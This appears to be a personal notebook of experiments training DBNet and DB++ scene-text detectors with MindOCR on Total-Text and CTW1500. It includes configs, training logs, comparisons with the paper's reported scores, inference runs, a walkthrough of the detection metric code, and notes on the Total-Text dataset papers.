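kill <PID>                                       # then terminate it
# or in one shot; careful, this kills anything matching the pattern:
pkill -f "tools/train.py"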

Re-ran it on 8.2!

db++_r18_totaltext (hacked together) (7.16)

The upstream repo has no such config; let's try adding this straight into db_r18_totaltext.yaml:

use_asf: True            # Adaptive Scale Fusion
channel_attention: True  # Use channel attention in ASF

Run it!

nohup python tools/train.py --config configs/det/test_dbnet/db++_r18_totaltext.yaml > test_db++_r18_totaltext.log 2>&1 &

Let's analyze the results:

(Using the same result.log plotting script as in the db_r18_totaltext section above.)


Tally the 10 best F-scores and their epochs:

def get_top_10(lst):
    # pair each value with its index
    enumerated_lst = list(enumerate(lst))

    # sort the pairs by value, descending
    sorted_lst = sorted(enumerated_lst, key=lambda x: x[1], reverse=True)

    # take the 10 largest values together with their indices
    top_10 = sorted_lst[:10]

    return top_10

# data[3] holds the f-score column parsed from result.log
result = get_top_10(data[3])

# print the results
for index, value in result:
    print(f"epoch: {index + 1}, F-score: {value}")
epoch: 205, F-score: 0.8386
epoch: 217, F-score: 0.8376
epoch: 216, F-score: 0.8375
epoch: 402, F-score: 0.8372
epoch: 224, F-score: 0.8371
epoch: 209, F-score: 0.837
epoch: 230, F-score: 0.8369
epoch: 404, F-score: 0.8369
epoch: 223, F-score: 0.8368
epoch: 269, F-score: 0.8368
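For what it's worth, the standard library can do the same top-10 more idiomatically; this sketch is equivalent (sorted() and heapq.nlargest break ties the same way):

import heapq

# data[3] is the f-score column parsed from result.log, as above
for index, value in heapq.nlargest(10, enumerate(data[3]), key=lambda x: x[1]):
    print(f"epoch: {index + 1}, F-score: {value}")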

emmmm, the loss keeps dropping, but the F-score plateaued very early. And the final result is actually worse than plain db_r18_totaltext? What the hell!

Performance at epoch 800 in the original paper:

Method | P | R | F
DB-ResNet-18++ (800) | 84.3 | 81.0 | 82.6

Performance at epoch 800 from my result.log:

Method | P | R | F
DB-ResNet-18++ (800) | 85.6 | 81.4 | 83.4

Performance at epoch 1024 in the original paper:

Method | P | R | F
DB-ResNet-18++ (1024) | 86.7 | 81.3 | 83.9

Performance at epoch 1024 from my result.log:

Method | P | R | F
DB-ResNet-18++ (1024) | 84.9 | 81.3 | 83.0

Hilarious; it's worse than at epoch 800.

db++_r18_ctw1500 (8.4)

nohup python tools/train.py --config configs/det/test_dbnet/db++_r18_ctw1500.yaml > test_db++_r18_ctw1500.log 2>&1 &

db_r50_totaltext (7.27)

nohup python tools/train.py --config configs/det/dbnet/db_r50_totaltext.yaml > test_db_r50_totaltext.log 2>&1 &

Let's analyze the results:


db_r50_ctw1500 (8.3)

nohup python tools/train.py --config configs/det/test_dbnet/db_r50_ctw1500.yaml > test_db_r50_ctw1500.log 2>&1 &

db++_r50_totaltext (hacked together)

Trained up... something (7.15-7.16)

The upstream repo has no such config, so I recklessly spliced db++_r50_icdar15.yaml and db_r50_totaltext.yaml into a db++_r50_totaltext.yaml. The whole difference between DB++ and DB comes down to these two lines:

use_asf: True            # Adaptive Scale Fusion
channel_attention: True  # Use channel attention in ASF

The resulting yaml, abridged:

system:
  mode: 0                      # 0 for graph mode, 1 for pynative mode in MindSpore
  distribute: False
  amp_level: 'O0'
  seed: 42
  log_interval: 10
  val_while_train: True
  val_start_epoch: 800
  drop_overflow_update: False

model:
  type: det
  transform: null
  backbone:
    name: det_resnet50
    pretrained: False
  neck:
    name: DBFPN
    out_channels: 256
    bias: False
    use_asf: True            # Adaptive Scale Fusion
    channel_attention: True  # Use channel attention in ASF
  head:
    name: DBHead
    k: 50
    bias: False
    adaptive: True
  pretrained: https://download.mindspore.cn/toolkits/mindocr/dbnet/dbnet_resnet50_synthtext-40655acb.ckpt

postprocess:
  name: DBPostprocess
  box_type: quad          # whether to output a polygon or a box
  binary_thresh: 0.3      # binarization threshold
  box_thresh: 0.7         # box score threshold
  max_candidates: 1000
  expand_ratio: 1.5       # coefficient for expanding predictions

...

optimizer:
  opt: momentum
  filter_bias_and_bn: false
  momentum: 0.9
  weight_decay: 1.0e-4

...

train:
  ema: True
  ckpt_save_dir: './tmp_det_db++_r50_totaltext'
  dataset_sink_mode: True
  dataset:
    type: DetDataset
    dataset_root: ./data/ocr_datasets
    data_dir: totaltext/images/Train
    label_file: totaltext/train_det_gt.txt

...

eval:
  ckpt_load_path: tmp_det_db++_r50_totaltext/best.ckpt
  dataset_sink_mode: False
  dataset:
    type: DetDataset
    dataset_root: ./data/ocr_datasets
    data_dir: totaltext/images/Test
    label_file: totaltext/test_det_gt.txt
    sample_ratio: 1.0

...

Run it! (The hacked db++_r50_totaltext.yaml lives under test_dbnet/.)

nohup python tools/train.py --config configs/det/test_dbnet/db++_r50_totaltext.yaml > test_db++_r50_totaltext.log 2>&1 &
========================================
Distribute: False
Model: det_resnet50-DBFPN-DBHead
Total number of parameters: 25613196
Total number of trainable parameters: 25559564
Data root: ./data/ocr_datasets
Optimizer: momentum
Weight decay: 0.0001
Batch size: 32
Num devices: 1
Gradient accumulation steps: 1
Global batch size: 32x1x1=32
LR: 0.007
Scheduler: polynomial_decay
Steps per epoch: 39
Num epochs: 1200
Clip gradient: False
EMA: True
AMP level: O0
Loss scaler: {'type': 'dynamic', 'loss_scale': 512, 'scale_factor': 2, 'scale_window': 1000}
Drop overflow update: False
========================================

Hilarious, it actually runs.

7.16: it made it to 800 epochs and then died again right when evaluation kicked in.

RuntimeError: Single op compile failed, op: assign_3372008743488672465_0.

Resuming from the checkpoint made it run again? How odd.

And the F-score is really low. Great, this batch feels botched; Ctrl + Z, shelving it for now.


Re-run (7.26)

Let's try adding this straight into db_r50_totaltext.yaml:

use_asf: True            # Adaptive Scale Fusion
channel_attention: True  # Use channel attention in ASF

Run it!

nohup python tools/train.py --config configs/det/test_dbnet/db++_r50_totaltext.yaml > test_db++_r50_totaltext.log 2>&1 &

Let's analyze the results:


The 10 best checkpoints:

[2023-07-27 05:32:23] mindocr.utils.callbacks INFO - Top K checkpoints:
f-score   checkpoint
0.8546    ./tmp_det_db++_r50_totaltext/e584.ckpt
0.8544    ./tmp_det_db++_r50_totaltext/e616.ckpt
0.8543    ./tmp_det_db++_r50_totaltext/e745.ckpt
0.8542    ./tmp_det_db++_r50_totaltext/e582.ckpt
0.8542    ./tmp_det_db++_r50_totaltext/e623.ckpt
0.8541    ./tmp_det_db++_r50_totaltext/e744.ckpt
0.8541    ./tmp_det_db++_r50_totaltext/e620.ckpt
0.8540    ./tmp_det_db++_r50_totaltext/e741.ckpt
0.8540    ./tmp_det_db++_r50_totaltext/e615.ckpt
0.8540    ./tmp_det_db++_r50_totaltext/e747.ckpt

This counts as the best-performing checkpoint of the lot.

Performance at epoch 800 in the original paper:

Method | P | R | F
DB-ResNet-50++ (800) | 87.9 | 82.8 | 85.3

Performance at epoch 800 from my result.log:

Method | P | R | F
DB-ResNet-50++ (800) | 86.3 | 83.9 | 85.1

Performance at epoch 1024 in the original paper:

Method | P | R | F
DB-ResNet-50++ (1024) | 88.5 | 82.0 | 85.1

Performance at epoch 1024 from my result.log:

Method | P | R | F
DB-ResNet-50++ (1024) | 85.8 | 83.4 | 84.6

db++_r50_ctw1500 (8.5)

nohup python tools/train.py --config configs/det/test_dbnet/db++_r50_ctw1500.yaml > test_db++_r50_ctw1500.log 2>&1 &

My own dataset (8.24)

nohup python tools/train.py --config configs/det/test_dbnet/db_r18_blendertext.yaml > test_db_r18_blendertext.log 2>&1 &

Inference (7.26, 7.29)

Offline inference only works on Ascend 310, but the server is an Ascend 910, so that's dead.

After torturing the Huawei support folks, word is that online inference works: set --image_dir, --det_algorithm and --det_model_dir, then run!

But it turns out this inference path only supports resnet50? Lame.

And it only draws rectangular boxes? Good heavens. (Though judging by config.py below, --det_box_type also accepts poly.)

    Ground Truth

    • 0999.jpg


• Ground Truth

0999.jpg	[{"transcription": "CHILDREN'S HOSPITAL", "points": [[57, 240], [104, 247], [151, 248], [198, 251], [245, 250], [292, 250], [340, 247], [343, 263], [295, 265], [247, 267], [199, 268], [152, 265], [104, 263], [57, 261]]}]

The official model

dbnet_resnet50_td500-0d12b5e8.ckpt

The pretrained model downloaded from the official page: dbnet_resnet50_td500-0d12b5e8.ckpt, from configs/det/dbnet/README_CN.md · MindSpore Lab/mindocr - Gitee.com.

python tools/infer/text/predict_det.py --image_dir ./data/ocr_datasets/ctw1500/train_images/0999.jpg \
    --det_algorithm DB \
    --det_model_dir ./dbnet_resnet50_td500-0d12b5e8.ckpt \
    --draw_img_save_dir ./inference_results/
[2023-07-29 10:54:44] mindocr.models.backbones.mindcv_models.utils INFO - Finish loading model checkpoint from: /home/ma-user/.mindspore/models/resnet50-e0733ab8.ckpt
[2023-07-29 10:54:45] mindocr.models.utils.load_model INFO - Finish loading model checkoint from ./dbnet_resnet50_td500-0d12b5e8.ckpt. If no parameter fail-load warning displayed, all checkpoint params have been successfully loaded.
[2023-07-29 10:54:45] mindocr INFO - Init detection model: DB --> dbnet_resnet50. Model weights loaded from ./dbnet_resnet50_td500-0d12b5e8.ckpt
[2023-07-29 10:54:45] mindocr INFO - Pick optimal preprocess hyper-params for det algo DB:
{'DetResize': {'target_size': None, 'keep_ratio': True, 'limit_side_len': 960, 'limit_type': 'max', 'padding': False, 'force_divisable': True}}
[2023-07-29 10:54:45] mindocr.data.transforms.det_transforms INFO - `limit_type` is max. Image will be resized by limiting the max side length to 960.
[2023-07-29 10:54:45] mindocr INFO -
Infering [1/1]: data/ocr_datasets/ctw1500/train_images/0999.jpg
[2023-07-29 10:54:45] mindocr INFO - Original image shape: (378, 620, 3)
[2023-07-29 10:54:45] mindocr INFO - After det preprocess: (3, 384, 640)
[2023-07-29 10:55:08] mindocr INFO - Num detected text boxes: 2
[2023-07-29 10:55:08] mindocr INFO - Done! Text detection results saved in ./inference_results/

This produces 0999_det_res.png and det_results.txt in inference_results/:

• det_results.txt

0999.jpg	[[[226, 253], [342, 249], [342, 262], [226, 266]], [[67, 243], [209, 252], [208, 268], [66, 259]]]
    • 0999_det_res.png


My own checkpoints

tmp_det_db_r50_totaltext/best.ckpt

python tools/infer/text/predict_det.py --image_dir ./data/ocr_datasets/ctw1500/train_images/0999.jpg \
    --det_algorithm DB \
    --det_model_dir ./tmp_det_db_r50_totaltext/best.ckpt \
    --draw_img_save_dir ./tmp_det_db_r50_totaltext/inference_results/
• det_results.txt

0999.jpg	[[[221, 247], [345, 243], [346, 270], [222, 275]], [[55, 237], [210, 248], [208, 275], [53, 264]]]
    • 0999_det_res.png


Such a big difference... presumably the hyper-parameters don't quite match...

tmp_det_db++_r50_totaltext/best.ckpt

python tools/infer/text/predict_det.py --image_dir ./data/ocr_datasets/ctw1500/train_images/0999.jpg \
    --det_algorithm DB \
    --det_model_dir ./tmp_det_db++_r50_totaltext/best.ckpt \
    --draw_img_save_dir ./tmp_det_db++_r50_totaltext/inference_results/
• det_results.txt

0999.jpg	[[[224, 248], [345, 244], [346, 267], [225, 272]], [[55, 239], [208, 247], [206, 274], [54, 266]]]

Available parameters

Looking at tools/infer/text/config.py, the following parameters are available:

def create_parser():
    parser_config = argparse.ArgumentParser(description="Inference Config File", add_help=False)
    parser_config.add_argument(
        "-c", "--config", type=str, default="", help='YAML config file specifying default arguments (default="")'
    )

    parser = argparse.ArgumentParser(description="Inference Config Args")
    # params for prediction engine
    parser.add_argument("--mode", type=int, default=0, help="0 for graph mode, 1 for pynative mode ")  # added
    parser.add_argument("--det_model_config", type=str, help="path to det model yaml config")  # added
    parser.add_argument("--rec_model_config", type=str, help="path to rec model yaml config")  # added

    # params for text detector
    parser.add_argument("--image_dir", type=str, help="image path or image directory")
    # parser.add_argument("--page_num", type=int, default=0)
    parser.add_argument(
        "--det_algorithm",
        type=str,
        default="DB++",
        choices=["DB", "DB++", "DB_MV3", "PSE"],
        help="detection algorithm.",
    )  # determine the network architecture
    parser.add_argument(
        "--det_amp_level",
        type=str,
        default="O0",
        choices=["O0", "O1", "O2", "O3"],
        help="Auto Mixed Precision level. This setting only works on GPU and Ascend",
    )  # added
    parser.add_argument(
        "--det_model_dir",
        type=str,
        default=None,
        help="directory containing the detection model checkpoint best.ckpt, or path to a specific checkpoint file.",
    )  # determine the network weights
    parser.add_argument(
        "--det_limit_side_len", type=int, default=960, help="side length limitation for image resizing"
    )  # increase if need
    parser.add_argument(
        "--det_limit_type",
        type=str,
        default="max",
        choices=["min", "max"],
        help="limitation type for image resize. If min, images will be resized by limiting the minimum side length "
        "to `limit_side_len` (prior to accuracy). If max, images will be resized by limiting the maximum side "
        "length to `limit_side_len` (prior to speed). Default: max",
    )
    parser.add_argument(
        "--det_box_type",
        type=str,
        default="quad",
        choices=["quad", "poly"],
        help="box type for text region representation",
    )

    # DB params
    parser.add_argument("--det_db_thresh", type=float, default=0.3)
    parser.add_argument("--det_db_box_thresh", type=float, default=0.6)
    parser.add_argument("--det_db_unclip_ratio", type=float, default=1.5)
    parser.add_argument("--max_batch_size", type=int, default=10)
    parser.add_argument("--use_dilation", type=str2bool, default=False)
    parser.add_argument("--det_db_score_mode", type=str, default="fast")

    # params for text recognizer
    parser.add_argument(
        "--rec_algorithm",
        type=str,
        default="CRNN",
        choices=["CRNN", "RARE", "CRNN_CH", "RARE_CH", "SVTR"],
        help="recognition algorithm",
    )
    parser.add_argument(
        "--rec_amp_level",
        type=str,
        default="O0",
        choices=["O0", "O1", "O2", "O3"],
        help="Auto Mixed Precision level. This setting only works on GPU and Ascend",
    )  # added
    parser.add_argument(
        "--rec_model_dir",
        type=str,
        help="directory containing the recognition model checkpoint best.ckpt, or path to a specific checkpoint file.",
    )  # determine the network weights
    # parser.add_argument("--rec_image_inverse", type=str2bool, default=True)
    parser.add_argument(
        "--rec_image_shape",
        type=str,
        default="3, 32, 320",
        help="C, H, W for target image shape. max_wh_ratio=W/H will be used to control the maximum width after "
        '"aspect-ratio-kept" resizing. Set W larger for longer text.',
    )

    parser.add_argument(
        "--rec_batch_mode",
        type=str2bool,
        default=True,
        help="Whether to run recognition inference in batch-mode, which is faster but may degrade the accuracy "
        "due to padding or resizing to the same shape.",
    )  # added
    parser.add_argument("--rec_batch_num", type=int, default=8)
    parser.add_argument("--max_text_length", type=int, default=25)
    parser.add_argument(
        "--rec_char_dict_path",
        type=str,
        default=None,
        help="path to character dictionary. If None, will pick according to rec_algorithm and rec_model_dir.",
    )
    # uncomment it after model trained supporting space recognition.
    # parser.add_argument("--use_space_char", type=str2bool, default=True)
    parser.add_argument("--vis_font_path", type=str, default="docs/fonts/simfang.ttf")
    parser.add_argument("--drop_score", type=float, default=0.5)
    parser.add_argument(
        "--rec_gt_path", type=str, default=None, help="Path to ground truth labels of the recognition result"
    )  # added

    #
    parser.add_argument(
        "--draw_img_save_dir",
        type=str,
        default="./inference_results",
        help="Dir to save visualization and detection/recognition/system prediction results",
    )
    parser.add_argument(
        "--save_crop_res",
        type=str2bool,
        default=False,
        help="Whether to save images cropped from text detection results.",
    )
    parser.add_argument(
        "--crop_res_save_dir", type=str, default="./output", help="Dir to save the cropped images for text boxes"
    )
    parser.add_argument(
        "--visualize_output",
        type=str2bool,
        default=False,
        help="Whether to visualize results and save the visualized image.",
    )
    parser.add_argument("--warmup", type=str2bool, default=False)

    return parser_config, parser
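Given that --det_box_type above accepts poly, the earlier "only rectangles" gripe may just be the quad default talking. A hedged, untested-on-my-side example asking the DB++ checkpoint for polygon output:

python tools/infer/text/predict_det.py --image_dir ./data/ocr_datasets/ctw1500/train_images/0999.jpg \
    --det_algorithm DB++ \
    --det_box_type poly \
    --det_model_dir ./tmp_det_db++_r50_totaltext/best.ckpt \
    --draw_img_save_dir ./inference_results/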

Evaluation (8.2)

The evaluation protocol lives in metrics/det_metrics.py:

from typing import List, Tuple

import numpy as np
from shapely.geometry import Polygon

import mindspore as ms
import mindspore.ops as ops
from mindspore import Tensor, ms_function, nn

__all__ = ["DetMetric"]

This is a module used by mindocr's (MindSpore OCR) evaluation pipeline. A walkthrough:

• from typing import List, Tuple: imports type hints for annotating parameter and return types.
• import numpy as np: imports NumPy for numerical computation and array handling.
• from shapely.geometry import Polygon: imports the Polygon class for working with polygon geometry.
• import mindspore as ms: imports MindSpore, an open-source deep learning framework.
• import mindspore.ops as ops: imports MindSpore's operator module.
• from mindspore import Tensor, ms_function, nn: imports Tensor, ms_function and nn, basic classes and decorators provided by MindSpore.
• __all__ = ["DetMetric"]: declares that the module exports only the DetMetric class; other names are not part of its public interface.

These imports pull in the dependencies the rest of the file relies on for data handling, evaluation and metric computation.

def _get_intersect(pd, pg):
    return pd.intersection(pg).area

This defines a function _get_intersect that takes two arguments pd and pg and returns the area of their intersection.

• pd and pg are both Polygon objects, presumably created with shapely.geometry.Polygon.
• pd.intersection(pg) computes the intersection of pd and pg and returns a new geometry.
• .area, called on that intersection geometry, gives its area.
• The function returns that area.

Its purpose is simply to compute two polygons' intersection area; in the evaluation code it measures the overlap between detected boxes and annotated boxes.

def _get_iou(pd, pg):
    return pd.intersection(pg).area / pd.union(pg).area

This defines _get_iou, which takes two polygons pd and pg and returns their Intersection over Union (IoU).

• pd and pg are both Polygon objects, presumably created with shapely.geometry.Polygon.
• pd.intersection(pg) computes their intersection; pd.union(pg) computes their union.
• .area is called on each of the two geometries to get the respective areas.
• Dividing the intersection area by the union area gives the IoU, which the function returns.

IoU measures how strongly two regions overlap. In detection tasks it is the standard score for how well a predicted box matches a ground-truth box, and that is exactly how _get_iou is used in this evaluator.
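A tiny worked example with axis-aligned unit squares offset by half a unit, so the numbers can be checked by hand:

from shapely.geometry import Polygon

# two unit squares whose overlap is a 0.5 x 1 rectangle
a = Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
b = Polygon([(0.5, 0), (1.5, 0), (1.5, 1), (0.5, 1)])

inter = a.intersection(b).area   # 0.5
union = a.union(b).area          # 1 + 1 - 0.5 = 1.5
print(inter / union)             # IoU = 0.333...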

class DetectionIoUEvaluator:
    """
    Converts ground truth and predicted polygon locations into binary classification labels based on
    the IoU between them. This simplifies metric calculations, such as Recall, Precision, etc.

    Args:
        min_iou: Minimum IoU between the ground truth and prediction to be considered as a correct prediction.
        min_intersect: Minimum intersection with an ignored ground truth for the prediction to be considered
            as ignored (and thus to be excluded from further calculations).
    """

    def __init__(self, min_iou: float = 0.5, min_intersect: float = 0.5):
        self._min_iou = min_iou
        self._min_intersect = min_intersect

    def __call__(self, gt: List[dict], preds: List[np.ndarray]) -> Tuple[List[int], List[int]]:
        """
        Converts GT and predicted polygons into binary classification labels, where 1 is positive and 0 is negative.

        Args:
            gt: list of ground truth dictionaries with keys: "polys" and "ignore".
            preds: list of polygons predicted by a model.
        Returns:
            binary labels for the ground truth and predicted polygons.
        """
        # filter invalid groundtruth polygons and split them into useful and ignored
        gt_polys, gt_ignore = [], []
        for sample in gt:
            poly = Polygon(sample["polys"])
            if poly.is_valid and poly.is_simple:
                if not sample["ignore"]:
                    gt_polys.append(poly)
                else:
                    gt_ignore.append(poly)

        # repeat the same step for the predicted polygons
        det_polys, det_ignore = [], []
        for pred in preds:
            poly = Polygon(pred)
            if poly.is_valid and poly.is_simple:
                poly_area = poly.area
                if gt_ignore and poly_area > 0:
                    for ignore_poly in gt_ignore:
                        intersect_area = _get_intersect(ignore_poly, poly)
                        precision = intersect_area / poly_area
                        # If precision enough, append as ignored detection
                        if precision > self._min_intersect:
                            det_ignore.append(poly)
                            break
                    else:
                        det_polys.append(poly)
                else:
                    det_polys.append(poly)

        det_labels = [0] * len(gt_polys)
        if det_polys:
            iou_mat = np.zeros([len(gt_polys), len(det_polys)])
            det_rect_mat = np.zeros(len(det_polys), np.int8)

            for det_idx in range(len(det_polys)):
                if det_rect_mat[det_idx] == 0:  # the match is not found yet
                    for gt_idx in range(len(gt_polys)):
                        iou_mat[gt_idx, det_idx] = _get_iou(det_polys[det_idx], gt_polys[gt_idx])
                        if iou_mat[gt_idx, det_idx] > self._min_iou:
                            # Mark the visit arrays
                            det_rect_mat[det_idx] = 1
                            det_labels[gt_idx] = 1
                            break
                    else:
                        det_labels.append(1)

        gt_labels = [1] * len(gt_polys) + [0] * (len(det_labels) - len(gt_polys))
        return gt_labels, det_labels

This code defines a class named DetectionIoUEvaluator, which converts ground-truth and predicted polygon locations into binary classification labels so that metrics such as recall and precision can be computed.

The class takes two parameters:

• min_iou: the minimum Intersection over Union (IoU) between a ground truth and a prediction for the prediction to count as correct.
• min_intersect: the minimum intersection with an ignored ground truth for a prediction to be treated as ignored (and thus excluded from further calculations).

The constructor __init__ accepts these two parameters and stores them as attributes.

The class also implements __call__, which takes two arguments, gt and preds, holding the ground-truth and predicted polygons respectively.

The method first filters out invalid ground-truth polygons and splits the rest into valid and ignored polygons, then does the same for the predicted polygons.

Next, for each predicted polygon, if ignored ground-truth polygons exist and the prediction's area is greater than 0, it computes the intersection area with each ignored ground truth and the ratio of that intersection to the prediction's area (the precision). If the precision exceeds the min_intersect threshold, the prediction is treated as ignored; otherwise it is kept as a valid prediction.

Then each valid prediction is compared against the ground-truth polygons by IoU; if the IoU exceeds the min_iou threshold, that ground truth is marked as a positive.

Finally, binary classification labels are produced, where 1 marks a positive and 0 a negative, and the labels for the ground-truth and predicted polygons are returned.

This class is likely used in detection tasks to match model predictions against ground-truth annotations by IoU, so that metrics (recall, precision) can be computed to assess model performance.
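As a quick sanity check, here is a toy run (hypothetical data; assumes numpy, shapely and the helpers above are in scope):

import numpy as np

evaluator = DetectionIoUEvaluator(min_iou=0.5, min_intersect=0.5)
gt = [{"polys": np.array([[0, 0], [10, 0], [10, 10], [0, 10]]), "ignore": False}]
preds = [np.array([[1, 1], [11, 1], [11, 11], [1, 11]])]  # IoU with the GT is 81/119, about 0.68

gt_labels, det_labels = evaluator(gt, preds)
print(gt_labels, det_labels)  # [1] [1] -> one true positive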

# approximate imports for this module; _safe_divide and DetectionIoUEvaluator are defined alongside
import mindspore as ms
import numpy as np
from mindspore import Tensor, nn, ops, ms_function


class DetMetric(nn.Metric):
    """
    Calculate Recall, Precision, and F-score for predicted polygons given ground truth.

    Args:
        device_num: number of devices used in the metric calculation.
    """

    def __init__(self, device_num: int = 1, **kwargs):
        super().__init__()
        self._evaluator = DetectionIoUEvaluator()
        self._gt_labels, self._det_labels = [], []
        self.device_num = device_num
        self.all_reduce = None if device_num == 1 else ops.AllReduce()
        self.metric_names = ["recall", "precision", "f-score"]

    def clear(self):
        self._gt_labels, self._det_labels = [], []

    def update(self, *inputs):
        """
        Compute the metrics on a single batch of data.

        Args:
            inputs (tuple): contain two elements preds, gt
                preds (dict): text detection prediction as a dictionary with keys:
                    polys: np.ndarray of shape (N, K, 4, 2)
                    score: np.ndarray of shape (N, K), confidence score
                gts (tuple): ground truth
                    - (polygons, ignore_tags), where polygons are in shape [num_images, num_boxes, 4, 2],
                      ignore_tags are in shape [num_images, num_boxes], which can be defined by output_columns in yaml
        """
        preds, gts = inputs
        preds = preds["polys"]
        polys, ignore = gts[0].asnumpy().astype(np.float32), gts[1].asnumpy()

        for sample_id in range(len(polys)):
            gt = [{"polys": poly, "ignore": ig} for poly, ig in zip(polys[sample_id], ignore[sample_id])]
            gt_label, det_label = self._evaluator(gt, preds[sample_id])
            self._gt_labels.append(gt_label)
            self._det_labels.append(det_label)

    @ms_function
    def all_reduce_fun(self, x):
        res = self.all_reduce(x)
        return res

    def cal_matrix(self, det_lst, gt_lst):
        tp = np.sum((gt_lst == 1) * (det_lst == 1))
        fn = np.sum((gt_lst == 1) * (det_lst == 0))
        fp = np.sum((gt_lst == 0) * (det_lst == 1))
        return tp, fp, fn

    def eval(self) -> dict:
        """
        Evaluate by aggregating results from all batches.

        Returns:
            average recall, precision, f1-score of all samples.
        """
        # flatten predictions and labels into 1D-array
        self._det_labels = np.array([lbl for label in self._det_labels for lbl in label])
        self._gt_labels = np.array([lbl for label in self._gt_labels for lbl in label])

        tp, fp, fn = self.cal_matrix(self._det_labels, self._gt_labels)
        if self.all_reduce:
            tp = float(self.all_reduce_fun(Tensor(tp, ms.float32)).asnumpy())
            fp = float(self.all_reduce_fun(Tensor(fp, ms.float32)).asnumpy())
            fn = float(self.all_reduce_fun(Tensor(fn, ms.float32)).asnumpy())

        recall = _safe_divide(tp, (tp + fn))
        precision = _safe_divide(tp, (tp + fp))
        f_score = _safe_divide(2 * recall * precision, (recall + precision))
        return {"recall": recall, "precision": precision, "f-score": f_score}

This code defines a class named DetMetric, which computes recall, precision and F1 score for predicted polygons against ground truth.

The class inherits from nn.Metric and has the following methods and attributes:

• __init__(self, device_num: int = 1, **kwargs): the constructor; device_num is the number of devices used for the metric computation. It creates a DetectionIoUEvaluator as the evaluator and initializes the remaining attributes.
• clear(self): clears the stored ground-truth and detection labels.
• update(self, *inputs): computes the metric state for a single batch. It takes two inputs, preds and gts. preds is a dictionary with keys "polys" and "score" holding the predicted polygons and confidence scores; gts is a tuple holding the ground-truth polygons and ignore tags. For each sample, the ground truth and predictions are passed to the DetectionIoUEvaluator and the resulting labels are stored.
• all_reduce_fun(self, x): performs the global all-reduce operation used in distributed computation.
• cal_matrix(self, det_lst, gt_lst): counts true positives, false positives and false negatives.
• eval(self) -> dict: aggregates over all batches and returns the average recall, precision and F1 score.

Here, the _safe_divide helper performs division safely, avoiding division by zero.

This class is likely used in detection tasks to compare predicted polygons against ground-truth annotations and compute recall, precision and F1 score for model evaluation.
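The metric arithmetic itself needs nothing from MindSpore; here is a toy sketch (hypothetical label arrays of the kind DetectionIoUEvaluator produces) of how cal_matrix and the final ratios combine:

import numpy as np

gt_lst = np.array([1, 1, 1, 0, 0])   # 3 GT boxes plus 2 unmatched detections
det_lst = np.array([1, 0, 1, 1, 1])  # 2 TP, 1 FN, 2 FP

tp = np.sum((gt_lst == 1) * (det_lst == 1))  # 2
fn = np.sum((gt_lst == 1) * (det_lst == 0))  # 1
fp = np.sum((gt_lst == 0) * (det_lst == 1))  # 2

recall = tp / (tp + fn)                                   # 2/3
precision = tp / (tp + fp)                                # 1/2
f_score = 2 * recall * precision / (recall + precision)   # harmonic mean, about 0.571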

def _safe_divide(numerator, denominator, val_if_zero_divide=0.0):
    if denominator == 0:
        return val_if_zero_divide
    else:
        return numerator / denominator

_safe_divide is a helper that performs division while handling a zero denominator safely. It takes three arguments: numerator, denominator, and val_if_zero_divide (the value returned when the denominator is zero, defaulting to 0.0).

Its logic is:

• If denominator equals zero, return val_if_zero_divide.
• Otherwise, return numerator / denominator.

This avoids division-by-zero errors: when the denominator is zero, a chosen default is returned instead, so downstream calculations are unaffected.
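A quick check of its behavior:

print(_safe_divide(6, 3))        # 2.0
print(_safe_divide(1, 0))        # 0.0 (default fallback)
print(_safe_divide(1, 0, -1.0))  # -1.0 (custom fallback)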


Resources

Covers two works:

    Total-Text: A Comprehensive Dataset for Scene Text Detection and Recognition

    Abstract

Curved text is almost absent from the common text datasets (ICDAR'13, MSRA-TD500), whereas Total-Text has it. Recently, new solutions that cast text detection as a segmentation problem have demonstrated their effectiveness on multi-oriented text.

    1 INTRODUCTION

There are almost no curved-text datasets around; CUTE80 is the only one available, but with just 80 images it is of little use.

Without a suitable dataset, efforts to tackle curved text detection rarely appear.

    Total Text

• A scene text dataset that accounts for curved text, filling the orientation gap in existing scene text datasets
• 1555 scene images, 4265 text instances, 9330 annotated words
• Three different text orientations: horizontal, multi-oriented and curved

    png

Row 1: ICDAR 2013, ICDAR 2015 and MSRA-TD500 (almost no curved text)
Row 2: Total-Text, which has curved text

    png

Existing text detection methods all handle curved text poorly.

    A. Scene Text Datasets

• The ICDAR series: a few hundred to a few thousand images each, with often blurry text.

• MSRA-TD500, introduced in 2012 to address the lack of arbitrarily oriented text in scene text datasets. It has 300 training and 200 test images, annotated with minimum-area rectangles.

• COCO-Text, introduced in 2016, is large (63686 images and 173589 labeled text regions) and also covers horizontal, multi-oriented and curved text; however, its ground truth is only bboxes, which works only for horizontal and vertical text.

• CUTE80 has only 80 images, far too few.

    B. Scene Text Detection

Surveys various scene text detection models; omitted.

    3 TOTAL-TEXT DATASET

    A. Dataset Attributes

• Curved text is an overlooked problem: on the horizontal-text ICDAR benchmarks, performance is nearly saturated (f-scores reach 0.9).

• Curved text observation: geometrically, a straight line has no angle change along its length, so it can be described by a linear function y = mx + c. A curve is not a straight line; its angle is free to change along its entire length.

• Orientation assumption: many current text detection models build in an orientation assumption, which presumably falls apart on curved text.

• Focused scene text as a start: the ICDAR-series text is of poor visual quality; the authors argue that slightly better text quality is a better starting point for research on this problem.

• Tighter groundtruth is better: ICDAR 2015 uses quadrilaterals (four points) and COCO uses bboxes (two points). In Total-Text, text regions are annotated with tightly fitting polygons.

• Evaluation Protocol: like the ICDAR datasets, Total-Text uses DetEval.

• Annotation Details: bbox annotations are still kept. Total-Text only considers English characters in natural images; other languages, digital watermarks and unreadable text are labeled "do not care".

B. Dataset Statistics

• Strength in numbers: 9330 annotated text instances in total, about 6 per image on average. More than half of the images in Total-Text have two or more different orientations, averaging 1.8 orientations per image. The dataset collection also took quality into account.

    png

• Orientation diversity: about half of the instances are curved:

  • Horizontal curve: 57.1%
  • Vertical curve: 23.5%
  • Circular: 17.3%
  • Wavy: 2%

Curved text usually co-occurs with horizontal or multi-oriented text. The mix of orientations within an image challenges detection algorithms to be robust and general with respect to text orientation.

• Scene diversity: curved text appears across a good variety of scenes.

4 SEMANTIC SEGMENTATION FOR TEXT DETECTION

    A. DeconvNet

Introduces their proposed DeconvNet, pre-trained on the largest scene text dataset, COCO-Text. COCO-Text images are split into legible and illegible text; the network is trained only on the legible text, since that portion is closest to this dataset.

    B. Experiments

Dataset    | Recall | Precision | F-score
Total-Text | 0.33   | 0.40      | 0.36

    Total-Text: toward orientation robustness in scene text detection

    Abstract

Text orientations in current scene text datasets are not diverse enough.

The proposed Total-Text covers three different text orientations:

• horizontal
• multi-oriented
• curve-oriented

